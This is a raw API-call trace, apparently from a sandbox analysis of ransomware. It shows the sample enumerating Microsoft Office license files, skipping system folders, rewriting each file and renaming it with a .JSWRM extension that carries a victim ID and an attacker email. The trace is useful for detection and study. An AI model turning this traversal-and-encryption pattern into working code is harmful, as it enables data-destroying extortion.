[0102.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0102.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0102.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.588] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0102.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0102.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0102.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0102.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0102.589] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2daee42, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2daee42, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe30113f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d3d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessVL_MAK-ul-oob.xrm-ms", cAlternateFileName="AC2E1B~1.XRM")) returned 1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned -1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.589] lstrcmpiW (lpString1="AccessVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0102.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2411c8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0102.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0102.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241128, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0102.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0102.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0102.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.590] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11581) returned 1 [0102.590] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0102.590] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0102.597] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.597] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0102.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.598] CloseHandle (hObject=0x45c) returned 1 [0102.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0102.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0102.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0102.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0102.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0102.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0102.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.598] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0102.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0102.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0102.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0102.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.599] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2fc4ef7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2fc4ef7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe318eac3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessVL_MAK-ul-phn.xrm-ms", cAlternateFileName="ACEEE9~1.XRM")) returned 1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned -1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.599] lstrcmpiW (lpString1="AccessVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ul-phn.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0102.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ul-phn.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ul-phn.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0102.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ul-phn.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0102.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0102.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0102.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.602] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19926) returned 1 [0102.602] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0102.602] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.605] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.605] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.605] CloseHandle (hObject=0x45c) returned 1 [0102.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0102.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0102.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0102.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0102.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0102.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0102.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.605] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0102.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0102.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0102.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0102.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0102.606] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2fc4ef7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2fc4ef7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe324d6a5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc8b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="client-issuance-bridge-office.xrm-ms", cAlternateFileName="CL0848~1.XRM")) returned 1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2=".") returned 1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="..") returned 1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="...") returned 1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="windows") returned -1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="recovery") returned -1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="perflogs") returned -1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="documents and settings") returned -1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="system volume information") returned -1 [0102.606] lstrcmpiW (lpString1="client-issuance-bridge-office.xrm-ms", lpString2="msocache") returned -1 [0102.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0102.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-bridge-office.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-bridge-office.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-bridge-office.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0102.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0102.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0102.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-bridge-office.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-bridge-office.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-bridge-office.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0102.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0102.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0102.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0102.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-bridge-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-bridge-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.608] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3211) returned 1 [0102.608] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc80) returned 0x205850 [0102.608] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xc80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xc80, lpOverlapped=0x0) returned 1 [0102.614] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.614] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xc80, lpOverlapped=0x0) returned 1 [0102.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.614] CloseHandle (hObject=0x45c) returned 1 [0102.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0102.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, 